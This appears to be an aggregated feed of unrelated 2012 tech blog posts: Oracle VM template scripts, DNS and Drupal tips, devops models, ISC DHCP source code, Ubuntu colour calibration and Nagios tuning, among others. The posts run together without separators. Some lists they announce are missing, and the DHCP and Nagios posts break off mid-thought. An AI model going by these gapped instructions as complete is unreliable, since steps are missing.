A few years ago we created a Linux rpm called oraclevm-template-config. This is a very small package that contains a number of scripts that esssentially do the following:

These things are very straightforward and we wrote it specifically to build Oracle VM templates but there was nothing specific to Oracle VM or virtualization there. The newer version of this, which we released along with Oracle VM 3.x is very much tied into Oracle VM. In the new version (3.x) we integrate the first boot scripts and the configuration scripts with the Oracle VM VM api where it's now possible to send remote VM messages to configure the VM. So in order to automate deployment and have very integrated and fancy assemblies or Oracle VM based templates, this is the way to go. If, however, you want something very simple, with lcoal console (physical or virtual), where it can be on a physical server where you want to reboot and reconfigure and install, whether this is a VirtualBox VM or an Oracle VM VM or, for that matter any other Virtualization technology based VM. the older version is quite usable. I tend to use that one for the VirtualBox templates that I create all the time.

We just published this rpm on http://public-yum.oracle.com. The rpm can be directly downloaded for Oracle Linux 5, here. Or when you have a system registered with public-yum or with ULN it is also in the add-ons channel. If you have a yum repo config then just enable the addon channel and you can simple type yum install oraclevm-template-config.

So what are some of the basics you can do :

initial install By default when you install template config, you have a service that provides the basic, configure root password, setup local network at what's called firstboot. To enable this to happen at the next reboot (which one can then call firstboot), just simple type /usr/sbin/oraclevm-template --enable. There is a simple default cleanup script which un-configures the network and removes ssh keys : /usr/sbin/oraclevm-template --cleanup. Keep in mind that when you run this script, the network will reset to dhcp and you will lose your network connection if you are in a remote ssh session.

So once you do this and reboot your server or your VM. The next reboot will automatically start /usr/sbin/oraclevm-template --config and go through the questionnaire.

The base configuration script is /etc/sysconfig/oraclevm-template. If you enable the service, you will see RUN_TEMPLATE_CONFIG=YES. This means next boot it will run. There is also a log file /var/log/oraclevm-template.log.

If all you need is a simple way of packaging a VM or configure a physical server that deals with network setup, the above is enough. If you have your own software installed and it can handle IP changes without reconfiguration, then you can create an appliance and once firstboot happens, the configuration is set, network is setup, your application comes up and you're done. However, in some cases you want to run your own scripts and integrate with this template configuration. We also handle that case...

If you write your own shell script (or really any script) that you install on the system, you can add that script to /etc/sysconfig/oraclevm-template and instead of doing the default firstboot run, it will at firstboot (when you call --enable) execute your script instead. Simply by setting TEMPLATE_CONFIG_SCRIPT=/myscript.sh. Inside that script you can do whatever you want... You can also provide a cleanup script for --cleanup, using TEMPLATE_CLEANUPS_SCRIPT=mycleanupscript.sh.

Keep in mind that we do not automatically run --cleanup, this is a manual step. I would recommend doing the following :

We provide a few default function you can include in your own scripts. These functions are defined in /usr/lib/oraclevm-template/functions just source them in your bash script.

ovm_configure_network [dhcp [hostname]] | [static] | [ip_adddress netmask gateway dns_server hostname]

You can call this like ovm_configure_network "dhcp" in your script and it will configure your network that way. If you set it to static then there will be a dialog for entering ip, hostname, gateway, netmask, dns, or if you provide that in your function call it will just set the changes without dialog.

ovm_cleanup_os
A simple OS cleanup. This resets the network to dhcp and cleans up ssh keys.

ovm_disable_firewall
disable iptables

press_anykey
Shows user input to enter a key in your script execution flow

ovm_error_message Displays an error message to the screen and also to /var/log/oraclevm-template.log

ovm_info_message Displays an informational message to the screen and also to /var/log/oraclevm-template.log

ovm_warn_message Displays a warning message to the screen and also to /var/log/oraclevm-template.log

All of the above is very simple, yet very powerful. Like I mentioned in the beginning, I use this all the time when creating both VirtualBox and Oracle VM server templates and it makes my life so much easier. People often write these on their own but I wanted to share how to do this so, when you use Oracle Linux, and/or Oracle VM Server or Oracle VM VirtualBox or anything else, and you're building a cool appliance, physical or virtual, use it and you don't even need a support subscription to download it:)...

The wait is finally over, no need to go through the daily Aurora upgrade process any more; Firefox Mobile 14 beta (available in the Google Play store) is out with all the improvements that were in the Aurora builds.

The main differences with the previous (non-Aurora) versions: Firefox on Android doesn’t use XUL (the Mozilla cross platform UI toolkit) any more, but switched to native Android UI elements. This (and other less visible changes) results in faster startup time, lower memory usage and better overall performance. There’s Flash in it as well, but with ‘tap to play’ option so the impact, I’m happy to report, is pretty limited. And the start-page is pretty nifty, with “Top Sites”, “Tabs from last time” and “Tabs on other computers” on one nice screen.

I must admit I was slightly worried at first, as I couldn’t get Sync to work at all (“could not connect to server” and similar error messages), but after uninstalling Aurora, Firefox Mobile Beta can sync just fine. All in all Firefox Mobile is an even greater browser than it was before.

Possibly related twitterless twaddle:

• While waiting for Firefox Mobile 11
• Mobile browsers: Opera Mobile 12 shines in html5test
• Chrome for Android finally arrives

I recently installed a DNS sever using Ubuntu 12.04.  The server should serve only my exernal domain, but should use an internal server for it's own name resolution.

Setting dns-nameservers to the correct ip in /etc/network/interfaces did not work on this host (but does on all my non-dns hosts).

After some digging, I found the cause: resolvconf always reverts to nameserver 127.0.0.1 which in turn queries the hosts in dns-nameservers.  Because my host is already a nameserver, 127.0.0.1 points to my bind instance instead of a caching daemon.

The solution I found was to put my entries in /etc/resolvconf/resolv.conf.d/head, this way they end up on top of the resolv.conf file and the real DNS server gets queried first!

I finally took the time to make my 'drupaldev'-repository available.

First a short introduction: It is my strong opinion that Drupal modules which are only used during development, such as devel, diff, etc, should never be deployed to production. They shouldn't even be in the repository. Instead, I keep a personal collection of development-modules in a separate repo. Thanks to the fact that Drupal recursively searches for modules inside the modules folder, I can simply create a symlink to my collection of development modules. This allows me to use my preferred modules, even though they are not in the repository for the project.

For Drupal7, I usually just create a symlink, named devmodules7, in sites/all/modules. Like this:

1
2

# from the drupal root of the project
ln -s ~/drupaldev/devmodules7 sites/all/modules/

The repository itself contains a collection of modules, for both Drupal 6 and Drupal 7, and some utility-scripts. After experimenting with copies of the modules and git submodules, I finally settled on drush make to manage the modules. Instead of copying all the modules in my repo, I only keep a make-file for each Drupal version (currently 6 & 7). This makes it really easy to update all the modules, as I can simply run the makefile again. To make this even easier I have added a build script which will run all the drush make-files with the correct arguments:

1

./build

read more

While working on the Devops Cookbook with my fellow authors Gene Kim,John Willis,Mike Orzen we are gathering a lot of "devops" practices. For some time we struggled with structuring them in the book. I figured we were missing a mental model to relate the practices/stories to.

This blogpost is a first stab at providing a structure to codify devops practices. The wording, descriptions are pretty much work in progress, but I found them important enough to share to get your feedback.

Devops in the right perspective

As you probably know by now, there are many definitions of devops. One thing that occasionally pops up is that people want to change the name to extend it to other groups within the IT area: star-ops, dev-qa-ops, sec-ops, ... From the beginning I think people involved in the first devops thinking had the idea to expand the thought process beyond just dev and ops. (but a name bus-qa-sec-net-ops would be that catchy :).

I've started reffering to :

• devops : collaboration,optimization across the whole organisation. Even beyond IT (HR, Finance...) and company borders (Suppliers)
• devops 'lite' : when people zoom in on 'just' dev and ops collaboration.

As rightly pointed out by Damon Edwards , devops is not about a technology , devops is about a business problem. The theory of Contraints tells us to optimize the whole and not the individual 'silos'. For me that whole is the business to customer problem , or in lean speak, the whole value chain. Bottlenecks and improvements could be happen anywhere and have a local impact on the dev and ops part of the company.

So even if your problem exists in dev or ops, or somewhere between, the optimization might need to be done in another part of the company. As a result describing pre-scriptive steps to solve the 'devops' problem (if there is such a problem) are impossible. The problems you're facing within your company could be vastly different and the solutions to your problem might have different effects/needs.

If not pre-scriptive, we can gather practices people have been doing to overcome similar situations. I've always encouraged people to share their stories so other people could learn from them. (one of the core reasons devopsdays exists) This helps in capturing practices, I'd leave it in the middle to say that they are good or best practices.

Currently a lot of the stories/practices are zooming in on areas like deployment, dev and ops collaboration, metrics etc.. (Devops Lite) . This is a natural evolution of having dev and ops in the term's name and given the background of people currently discussing the approaches. I hope that in the future this discussion expands itself to other company silos too: f.i. synergize HR and Devops(Spike Morelli) or relate our metrics to financial reporting.

Another thing to be aware of is that a system/company is continously in flux: whenever something changes to the system it can have an impact; So you can't take for granted that problems,bottle-necks will not re-emerge after some time. It needs continuous attention. That will be easier if you get closer to a steady-state, but still, devops like security is a journey, not an end state.

Beyond just dev and ops

Let's zoom in on some of the practices that are commonly discussed: the direct field between 'dev' and 'ops'.

In most cases, 'dev' actually means 'project' and 'ops' presents 'production'. Within projects we have methodologies like (Scrum, Kanban, ...) and within operations (ITIL, Visble Ops, ...). Both parts have been extending their project methodology over the years: from the dev perspective this has lead to 'Continous Delivery' and from the Ops side ITIL was extended with Application Life Cycle (ALM). They both worked hard on optimize the individual part of the company and less on integration with other parts. Those methodologies had a hard time solving a bottleneck that outside their 'authority'. I think this where devops kicks in: it seeks the active collaboration between different silos so we can start seeing the complete system and optimize where needed, not just in individual silos.

Devops Areas

In my mental model of devops there are four 'key' areas:

• Area 1 : Extend delivery to production (Think Jez Humble) : this is where dev and ops collaborate to improve anything on delivering the project to production
• Area 2 : Extend Operation to project (Think John Allspaw) : all information from production is radiated back to the project
• Area 3 : Embed Project(Dev) into Operations : when the project takes co-ownership of everything that happens in production
• Area 4 : Embed Production(Ops) into Project : when operations are involved from the beginning of the project

In each of these areas there will be a bi-directonal interaction between dev and ops, resulting in knowledge exchange and feedback.

Depending on where your most pressing 'current' bottleneck manifests itself, you may want to address things in different areas. There is no need to first address things in area1 than area2. Think of them as pressure points that you can stress but requiring a balanced pressure.

Area 1 and Area2 tend to be heavier on the tools side , but not strictly tools focused. Area3 and Area4 will be more related to people and cultural changes as their 'reach' is further down the chain.

When visualized in a table this gives you:

As you can see:

• the DEV and OPS part keep having their own internal processes specific to their job
• the two processes are becoming aligned and the areas extend both DEV and OPS to production and projects
• it's almost like a double loop with area1 and area2 as the first loop and area3 and area4 as the second loop

Note 1: these areas definitely need 'catchier' names to make them easier to remember. Note 2: Ben Rockwoods post on "The Three Aspects of Devops" lists already 3 aspects but I think the areas make it more specific

Area Layers

In each of these areas, we can interact at the traditional 'layers' tools, process, people:

So whenever I hear story , I try to relate it's practice to one of these areas as described above and the layer it's adressing. Practices can have an impact at different layers so I see them as 'tags' to quickly label stories. Another benefit is that whenever you look at an area, you can ask yourself what practices we can do to improve each of these layers. To have a maximum impact on each of the layers, it's clear that the approach needs to be layered in all three.

The ultimate devops tools would support the whole people and process in all of these areas, not just in Area1 (deployment) or Area2 (monitoring/metrics). Therefore a devops toolchain with different tools interacting in each of the areas makes more sense. Also the tool by itself doesn't make it a devops tool: configuration mangement systems like chef and puppet are great, but when applied in Ops only don't help our problem much. Of course Ops gets infrastructure agilitity, but it isn't until it is applied to the delivery (f.i. to create test and development environments) that it becomes 'devops'. This shows that the mindset of the person applying the tool makes it a devops tool, not the tool by itself.

Area Maturity Levels

Now that we have the areas and layers identified, we want to track progress as we start solving our problems and are improving things.

Adrian Cockroft suggested using CMMI levels for devops:

CMMI levels allow you to quantify the 'maturity' of your process. That addresses only one layer (although an equally important one). In a nutshell CMMI describes the different levels as:

1. Initial : Unpredictable and poorly controlled process and reactive nature
2. Managed : Focused on project and still reactive nature
3. Defined : Focused on organization and proactive
4. Quantively Managed : Measured and controller approach
5. Optimizing : Focus on Improvement

All these levels could be applied to dev , ops or devops combined. It gives you an idea at what level process is in, while you are optimizing in an area.

An alternative way of expressing maturity levels is used by the Continuous Integration Maturity Model. It puts a set of practices in levels of maturity: (industry consensus)

1. Intro : using source control ...
2. Novice : builds trigger by commit ...
3. Intermediate : Automated deployment to testing ..
4. Advanced : Automated Functional testing ...
5. Insane : Continuous Deployment to Production ...

Instead of focusing on the proces only , it could be applied to a set of tools, process or people practices. What people consider the most advanced would get the highest maturity level.

Practices, Patterns and principles

A practice could be anything from an anecdotal item to a systemic approach. Similar practices can be grouped into patterns to elevate them to another level. Similar to the Software Design Patterns we can start grouping devops practices in devops patterns.

Practices and patterns will rely on principles and it's these underlying principles that will guide you when and you to apply the pattern or practice. These principles can be 'borrowed' from other fields like Lean, Systems Theory etc, Human Psychology. The principles are what the agile manifesto is about for example.

Slowly we will turn the practices -> patterns -> principles .

Note: I'm wondering if there will be new principles that will emerge from from devops itself or it will be apply existing principle to a new perspective.

A few practical examples:

Below are a few example 'practices' codified in a standard template. The practices/patterns/principles are not yet very well described. The point is more that this can serve as a template to codify practices.

Area Indicators

The idea is to list metrics/indicators that can tracked. The numbers as such might be not be too relevant but the rate of change would be. This is similar to tracking the velocity of storypoints or the tracking of mean time to recovery.

Note: I'm scared of presenting these as metrics to track, therefore I call them indicators to soften that.

Examples would be :

• Tools Layer : Deploys/Day
• Process Layer : Number of Change Requests/Day
• People Layer : People Involved per deploy

This is not yet fleshed out enough , I'm guessing it will be based on my research done for my Velocity 2011 Presentation (Devops Metrics)

Devops Scorecard

To present progress during your 'devops' journey you can put all these things in a nice matrix, to get an overview on where you are at optimizing at the different layers and areas.

Obviously this only makes sense if you don't lie to yourself, your boss, your customers.

Project Teams, Product Teams and NOOPS

Jez Humble often talks about project teams evolving to product teams: largere silos will split of not by skill, but for product functionality they are delivering. Splitting teams like that, has the potential danger of creating new silos. It's obvious these product teams need to collaborate again. You should treat other product teams are external dependencies, just like other Silos. The areas of interaction will be very similar.

Also you can see the term NOOPS as working with product teams outside your company, like you rely on SAAS for certain functions. It's important not only to integrate in each of the areas on the tools layer, but also on the people and process layer. Something that is often forgotten. Automation and abstraction allows you to go faster but when things fail or even changes occur, synchronisation needs to happen.

CAMS and areas

The CAMS acronym (Culture, Automation, Measurement, Sharing) could be loosely mapped onto the areas structure:

• Automation seems to map to Area1: the delivery process
• Measurement seems to map to Area2: the feedback process
• Culture to Area3 : embedded devs in Production
• Sharing to Area4: embedded ops in Projects

Of course automation, measurement, culture and sharing can happen in any of the areas, but some of the areas seem to have a stronger focus on each of these parts.

Conclusion

Devops areas, layers and maturity levels, give us a framework to capture new practices stories and it can be used to identify areas of improvements related to the devops field. I'd love feedback on this. If anyone wants to help, I'd like to bring up a website where people can enter their stories in this structure and make it easily available for anyone to learn. I don't have too much CPU cycles left currently , but I'm happy to get this going :)

P.S. @littleidea: I do want to avoid the FSOP Cycle

Dear all,

I am going to do a presentation about “JBoss Enterprise Workflow/BPM and Rules Solutions” in Belgium in May 2012.
If your company or you are based in BeNeLux and are interested by this presentation, just let me know and I will try to arrange a meeting for you.

Ref : http://www.redhat.com/products/jbossenterprisemiddleware/soa/

BR

Frederic

It's the time of year that all conferences are gearing up. Here's a list of conferences I'm speaking or wish I was attending.

• ChefConf 12 - May 15-17 : the place to be if you're anything with chef these days

• GOTOCon Copenhagen - May 21-23 (me speaking) : fun conference and very well organized although a bit too static to my taste.

• Devopsdays Tokyo - May 26: Tokyo was always on my list, I can't go , bummers. Botchagalupe is winning :)

• Atlassian Summit - May 30,June 1 (me speaking) : really proud to be opening the devops track at my current employer. First time my employer has an explicit interest in devops. Go-go atlassian!

• Kanban for Devops , Belgium June 18-19: initially announced that I would be there, and I was very keen on doing so. Work got in the way, so can't make. But if you can , you should! I'm sure @dominica will get your WIP (that is Work in Progress :)

• Velocity - June 25-27 : the uber conference on anything on web and performance

• Devopsdays MountainView - June 28-29 : this year at Google, looking forward to so much fun!

• Webperfdays - June 28 : interesting unconference happening on performance. Happening at the same time as Devopsdays at Google.

• Puppetconf - September 27-28 : and if you're into puppet, or config mgmt in general. A cool place to be , hope I can make it this year

• Velocity Europe - October 2-4 : since the success last year, Velocity Europe strikes again: Web Performance isn't a US only concern!

• Devopsdays Italy - October 6-7 : Rome, sweet rome - sun and devops - the perfect mix

• AppSec USA 2012 - October 23-24 : not 100% sure on this one, but rumors go on a devops track in a security conference - sounds like fun to me.

Busy times .... but .... Fun times!

Since updating my Samsung Galaxy  S II to Ice Cream Sandwich, I’ve regularly been experiencing the dreaded “connection error” in the mail client when trying to fetch mail from the corporate Exchange server. A colleague of mine, who agreed to have me upgrade his SGS2 after I promised  everything worked flawlessly, had the problem even more regularly.

Searching the web turned up this interesting thread on xda-developers, which had amongst others a fix for the adventurous, but also this eye-opening comment:

The messages in question are Read Receipts, Delivery Receipts and similar messages. Once there is one of those in your inbox, you’re stuck until you delete it. [...] A better solution which has worked for me is to create a folder for your receipts. Then, on your PC, create a rule to move the receipts to the folder on arrival. This will obviously also work when your PC is off, as the rules are stored and executed on the server. You will have to create a rule which processes emails on arrival, matches a series of strings in either subject or body of the message and moves them to the folder.

And that’s exactly what I did; mails sent only to me with “Declined:” or “Accepted:” or “Tentative:” or “Read:” or “Not read:” in the subject line are automatically moved into a “tmp” folder. Your mileage may vary (apparently there are other conditions under which the Android/ Samsung mail client has problems downloading items form Exchange), but based on my limited experience up until now, this workaround gets most problematic items in my Inbox out of the way. Now let’s hope Samsung fixes this blatant error (and that it isn’t in the ICS-version on that beautiful Samsung Galaxy S III)!

Possibly related twitterless twaddle:

• Pimping my Samsung Galaxy S II
• 7 days with my Ice Cream Samsung
• Why you shouldn’t rely on ajax’s same origin policy

Dear *,

Recently, I tried the JBPM 5.2.0 – JBoss Business Process Management – web management console and I had an application crash when I selected in the left menu the item “Process overview”.

Fortunately there is a solution to that problem which is to add the following line in the part of the build.xml file included in jbpm-installer_5.2.0 directory :

<!– Install reporting AS7 –>
<target name=”install.reporting.into.jboss7″ depends=”check.birt.as7″ if=”birt.download” >
<mkdir dir=”${install.home}/birt”/>
<unzip src=”${install.home}/lib/birt-runtime-${birt.version.as7}.zip”
dest=”${install.home}/birt”/>
<copy todir=”${install.home}/target/jbpm-gwt-console-server-war/WEB-INF/lib”>
<fileset dir=”${install.home}/birt/birt-runtime-${birt.version.as7}/ReportEngine/lib”>
<include name=”*/.jar”/>
<exclude name=”**/org.apache.commons.codec_1.3.0.v201101211617.jar”/>
</fileset>
</copy>

CLICK ON THE PICTURE TO ENLARGE IT

Ref : http://sourceforge.net/projects/jbpm/files/

http://www.jboss.org/jbpm

Best Regards

Frederic

We (and I’m fully part of it) deploy and use plenty of security monitoring tools daily. As our beloved data is often spread across complex infrastructures or simply across multiple physical locations, we have to collect interesting information and bring them in a central place for further analysis. That’s called “log management“. Based on your collected events, you can generate alerts, build reports. Nice! But… if systems and applications generate [hundreds|thousands|millions] of events, those ones are processed by the same kind of hardware running some piece of software. Hardware may fail (network outage, power outage, disk crash) and softwares have bugs (plenty of).

This morning, I received several alerts like this:

** Alert 1336642415.2196887: mail  - ossec,
2012 May 10 11:33:35 xxxxxxxx->ossec-monitord
Rule: 504 (level 10) -> 'Ossec agent disconnected.'
Src IP: (none)
User: (none)
ossec: Agent disconnected: 'xxxxxxxx-10.0.0.1'.

This message warns that an OSSEC agent is not alive and is very suspicious. And a few minutes later, same message for another server, and so on, one by one… After a quick check, all servers and network connections were fine. The problem was on the OSSEC server itself. A typo error in a new rule put some processes in a fuzzy state. Killing and the process and restarting properly the OSSEC server solved the problem. This example based on OSSEC is just an introduction to the topic of this quick blogpost: When you deploy security monitoring solutions, be sure to monitor them too!

In parallel to the security checks performed by your log management solution, extra verifications must be performed to control the flow of events and, when required, trigger other types of alerts. A classic situation is when events are pushed to the log management platform. It will  wait passively for incoming events. This can be resumed as “No event received? Everything ok! Let’s have some sleep…“. Examples of suspicious situations:

• You did not receive any new Syslog events from a specific host for x minutes.
  → The Syslog daemon might be down or a network outage prevent UDP packets to reach the Syslog concentrator.
• If you did not process new lines from an Apache log file.
  →Apache might be in trouble or the file system might be full. Can you read the log file? (wrong permissions)
• You did not receive any new alerts for x hours.
  →Your log management system might be overloaded, some process killed or a file system being full.

There are plenty of nightmare example like those. How to prevent them?

• Like any other information system, keep an eye on the system health (control the CPU, memory, storage, processes). Disk space is critical and directly depends on your amount of data and retention policies.
• Send keep-alives to your remote [pollers|sensors|agents] (whatever you name them).
• Control any derivation of your regular events flow (compared to a baseline for a defined period – hourly/daily/etc). Example, is it normal to not see any login events from your Active Directory on a Monday morning?
• Implement queuing mechanisms to prevent events to be lost (when they are automatically pushed to the central system).
• When possible, collect events using pull technologies. If the log management platform has troubles, events won’t be lost and will wait until being retrieved later.

Don’t forget: Log management solutions are your best friends when you need to investigate a security incident. There is nothing more frustrating than gaps in your events timeline!

Ik heb al 30 jaar een zwak voor Formule 1. Dat lijkt misschien vreemd voor iemand met groene sympathieën, maar wie zichzelf niet tegenspreekt, censureert z’n onvolmaaktheid. Soit, schijn-wijsheden daar gelaten, ik was 13 en geabonneerd op het weekblad Kuifje, dat naar aanleiding van de Grote Prijs van België een special over Formule 1 had gemaakt. In het midden een poster van die prachtige bloedrode Ferrari 126 C2. Ferrari was na pionier Renault de 2de constructeur met een turbo-motor en maakte dat jaar met de virtuoze Gilles Villeneuve en de consistent snelle Didier Pironi serieus kans om de wereldkampioen te leveren. Ik was onmiddellijk fan.

Maar tijdens die GP van België liep het anders. Toen ik op zaterdag 8 mei 1982 terugkwam van een wandeling met m’n ouders en vrienden van de familie, hoorde ik op de radio dat Gilles Villeneuve zwaar gecrasht was tijdens de oefenritten. Een dom ongeluk, gevolg van een misverstand tussen 2 ervaren piloten. Het voorwiel van Villeneuve’s Ferrari raakte bij een inhaalmanoeuvre het achterwiel van Jochen Mass’s March, de Ferrari vloog daardoor de lucht in (het “ground effect” werd verbroken) en werd 100m ver gekatapulteerd, landde hard met de neus in de grond, maakte verschillende buitelingen waarbij Villeneuve z’n helm verloor en de wagen verder desintegreerde. De Canadees eindigde uiteindelijk met wat restte van de cockpit, zonder helm, in een vanghek en werd enkele uren later officieel dood verklaard.

Een held minder op de startgrid, maar teamgenoot Pironi leek enkele races later wel goed op weg om wereldkampioen te worden. Tot de GP van Duitsland, waar ook hij zwaar crashte. De Fransman overleefde de klap, maar zou nooit meer racen.

Gisteren reed zoon (en wereldkampioen F1 1997)  Jacques Villeneuve met de Ferrari T4 waarmee z’n vader in 1979 schitterde. Maar als het voor U hetzelfde is, kijk ik liever nog eens naar dit heroïsch duel dat Gilles in 1979 met René Arnoux uitvocht:

Salut Gilles!

Possibly related twitterless twaddle:

• F1: de hond, het been en de wereld (niet) op zijn kop?
• Gilles Peterson & Thom Yorke draaien rare plaatjes
• Muziek om bij te verjaren: Eska

Dear Kettle friends,

Thursday May 10th, in a few days, I’ll be joining my friend Kasper Sørensen (the founder and lead architect of DataCleaner, a Human Inference data profiling project) in our web seminar (webinar).  We’ll be going over a bit of history, our cooperation model as well as the architecture behind the new data quality features.

Register here: http://www.pentaho.com/resources/events/20120510-better-data-for-better-analytics/

Kasper will also be doing 3 cool live demos on the subjects of data profiling and data quality.

I hope you’ll be able to join the crowd this Thursday May 10th, 10am PST (Los Angeles), 1pm EST (New York) or 7pm CET (Brussels).

We’ll be doing our best to answer your data quality questions simultaneously with the presentation.

See you there!

Cheers,
Matt

After complaining about Microsoft last time I figured I'd do something different this time: I'm going to complain about a piece of open source software.

It needs no introduction, but I'll give it one anyway: The ISC DHCP server and client are the standard DHCP(v4/v6) implementations and they're used all over the place.
Recently I was fixing a bug in a dhclient-script.sh. It incorrectly parsed an IAID value because it contained an '='.

The relevant bits of source code:

	ient_envadd(client, prefix, "iaid", "%s",
			print_hex_1(4, ia->iaid, 12));

Looking a little deeper there's the first disturbing bit:

#define print_hex_1(len, data, limit) print_hex(len, data, limit, 0)
#define print_hex_2(len, data, limit) print_hex(len, data, limit, 1)
#define print_hex_3(len, data, limit) print_hex(len, data, limit, 2)

#define HBLEN 1024
char *print_hex(len, data, limit, buf_num)
        unsigned len;       
        const u_int8_t *data;
        unsigned limit;      
        unsigned buf_num;    
{
        static char hex_buf_1[HBLEN + 1];
        static char hex_buf_2[HBLEN + 1];
        static char hex_buf_3[HBLEN + 1];
        char *hex_buf;

        switch(buf_num) {
          case 0:
                hex_buf = hex_buf_1;
                if (limit >= sizeof(hex_buf_1))
                        limit = sizeof(hex_buf_1);
                break;
          case 1:
                hex_buf = hex_buf_2;
                if (limit >= sizeof(hex_buf_2)) 
                        limit = sizeof(hex_buf_2);
                break;   
          case 2:        
                hex_buf = hex_buf_3;
                if (limit >= sizeof(hex_buf_3))
                        limit = sizeof(hex_buf_3);
                break;
          default:
                return(NULL);
        }

        print_hex_or_string(len, data, limit, hex_buf);
        return(hex_buf);
}

/*      
 * print a string as either text if all the characters
 * are printable or colon separated hex if they aren't
 *        
 * len - length of data 
 * data - input data
 * limit - length of buf to use 
 * buf - output buffer
 */       
void print_hex_or_string (len, data, limit, buf)
        unsigned len;
        const u_int8_t *data; 
        unsigned limit;
        char *buf;
{               
        unsigned i;
        if ((buf == NULL) || (limit < 3))
                return;
          
        for (i = 0; (i < (limit - 3)) && (i < len); i++) {
                if (!isascii(data[i]) || !isprint(data[i])) {
                        print_hex_only(len, data, limit, buf);
                        return;
                }
        }

        buf[0] = '"';
        i = len;
        if (i > (limit - 3))
                i = limit - 3;
        memcpy(&buf[1], data, i);
        buf[i + 1] = '"';
        buf[i + 2] = 0;
        return;
}       

The bad news: the default colour calibration wizard on Ubuntu 12.04 has a bug: awful magenta cast on some screens. Fine on others.

The good news: it works flawlessly using the (graphical) alternative below.

As a enthusiastic photographer (see my latest Perl Fosdem pictures) I am very positive about the colour management integration in the latest Ubuntu (12.04). Sure, colour calibration was possible before, but now it’s an integral part of the system and not a simple add-on. Ubuntu++

Once the reviews are in, I will probably buy the ColorHug open source hardware calibration device. In the meantime I borrowed an old Spyder2 (express) from my father-in-law. I do not recommend buying new devices from Colorvision. The company is known to be very antagonistic to free and open source software. But, if you already have the hardware in a drawer it’s better to use it.

Once you plug in the device, the “Calibration” button will activate and the necessary packages will be installed. However, for this HOWTO it’s easier just to install the software (and its dependencies) from a shell window:

$ sudo apt-get install gnome-color-manager

(This install argyll as a dependency that does the real calibration beneath the GUI.)

This step is only applicable if you have a Spyder 2 device. As mentioned above, the company is not FOSS-friendly and doesn’t even provide technical specifications. You will need the firmware of the device from the Windows driver. If you trust me, you can get mine here [MD5: 007ac5705a3a8ed7edf01569700e6ebf]. Put it in the .local/share/color directory in your home directory (create the needed directories if not present). It was extracted from the 2.3.6 Windows driver for the Spider2 Express (the latest at the time of writing). If you want to create the file yourself, see here. In short: you’ll need the driver CD. If you don’t have it or want/need a more up-to-date version, you’ll need to install the driver and feed the generated .dll to spyd2en: spyd2en -v ./CVSpyder.dll

In the GUI (Dash -> Applications -> Color, or simply type “color” and click the icon), if you select your screen and the “Calibrate…”, the steps offered by the wizard are straight forward. Very easy. While it worked great on the computer of my better half, the generated profile on my own laptop (attached to an external screen) had a terrible magenta cast. Not of the type “your eyes will adapt to it”.

After investigating and looking closely at the profile, it was clear that the profile used a 6500K white balance, instead of the 5000K requested in the wizard (it’s called “Photography and graphics” there). Furthermore, the wizard offered 3 calibrations options: 4, 10 and 20 minutes depending on the desired accuracy. While I chose 4 minutes for testing purposes, the calibration took a long time (an hour or longer). Also, the advanced output in the calibration window (hidden by default) categorised the screen as CRT while it’s a LCD. Because of this, I don’t think the problem is tied to the specific firmware (running the latest available) of the hardware, but rather to gnome-color-manager integration with the device and maybe certain configurations. I don’t have other calibration devices available to test. Bug reported.

dispcalGUI is a OS-agnostic alternative to gnome-color-manager and in fact – just as gnome-color-manager – and GUI on top argyll. Just download the deb (the most recent deb for Ubuntu 11.10 works fine on 12.04). If you double click it, the Ubuntu Software Manager will launch and perform the installation (or just use “dpkg -i” if you are a Debianista at heart).

Now, launch the dispcalGUI application from the Dash or just open a terminal (Ctrl + Alt + t) and type:

$ dispcalgui

Select the Photography profile, your screen (if you have a multi monitor setup) and probe your device (by clicking on the “recycle” arrows) and give your profile a more recognisable name and a location. I use brand_model_calibrationDevice, e.g. Samsung_SyncMaster2443FW_Spyder2Express). Click on Calibrate and Profile and go read a book or take some pictures (it will take a lot longer than 20 minutes, probably an hour). If you wish you can skip the white point and black level, YMMV.

Now go back to the Ubuntu Color Settings as above and add the new created profile by selecting your screen, then click “Add profile”, select other and choose the path you save the monitor profile.

Your monitor is now calibrated!

10K websites x 5 URL's to monitor

For our Atlassian Hosted Platform, we have about 10K websites we need to monitor. Those sites are monitored from a remote location to measure responsetime and availability. Each server would have about 5 sub URLs on average to check, resulting in 50K URL checks.

Currently we employ Nagios with check_http and require roughly about 14 Amazon Large Instances. While the nagios servers are not fully overloaded, we make sure that all checks would complete within a 5 minutes check cycle.

In a recent spike we investigated if we could do any optimizations to:

• use less server resources, not only to reduce costs but also avoiding the management of multiple nagios servers which don't dynamically rebalance checks across multiple nagios hosts.
• have all checks complete within a smaller window (say 1 minute), as this would increase our MTTD

While looking at this, we wanted the technology to be reusable with our future idea of a fully scalable and distributed monitoring in mind (think Flapjack or the new kid on the block Sensu). But for now, we wanted to focus on the checks only.

In the first blogpost of the series we look at the integration and options within Nagios. In a second blogpost we will provide proof of concept code for running an external process (ruby based) to execute and report back to nagios. Even though Nagios isn't the most fun to work with, a lot of solutions that try to replace it, focus on replacing the checks section. But Nagios gives you more the reporting, escalation, dependency management. I'm not saying there aren't solutions out there, but we consider that to be for another phase.

Check HTTP

The canonical way in Nagios to run a check is to execute Check_http.

F.i. to have it execute a check if confluence is working on https://somehost.atlassian.net/wiki , we would provide the options:

• -H (virtual hostname), -I (ipaddress) , -p (port)
• -u (path of url) , -S (ssl) , -f follow (follow redirects)

• -t (timeout)

  $ /usr/lib64/nagios/plugins/check_http -H somehost.atlassian.net -p 443 -u /wiki -f follow -S -v -t 2 HTTP OK: HTTP/1.1 200 OK - 546 bytes in 0.734 second response time |time=0.734058s;;;0.000000 size=546B;;;0

Some observations:

1. For each check configure Nagios will fork twice and exec check_http, avoiding this would improve performance as fork is considered expensive.
2. If we were to have many URL's on the same host, we can't leverage connection reuse, making it less efficient
3. For status checking, we can configure it to use the -J HEAD if our check doens't rely on the content of the page (saving on transfer time and reduce check time)
4. Redirects: not an issue of Nagios, but we currently have quite a few redirects going from the login-page logic, reducing those would again improve check time.

We can reduce part of the forks by using the use_large_installation_tweaks=1 setting. The benefits and caveats are explained in the docs

Check scheduling

Nagios itself tries to be smart to schedule the checks. It tries to spread the number of service checks within the check interval you configure. More information can be found in older Nagios documentation .

Configuration options that influence the scheduling are:

• normal_check_interval : how long between re-executing the same check
• retry_check_interval : how fast to retry a check if it failed
• check_period: total time for a complete check cycle
• inter_check_delay_method: method to schedule checks (
• service_interleave_factor: time between checks to the same remote host
• max_concurrent_checks: obvious not ?
• service_reaper_frequency : frequency to check for rogue checks

Default for the inter_check_delay_method is to use smart, if we want to execute the checks as fast as possible

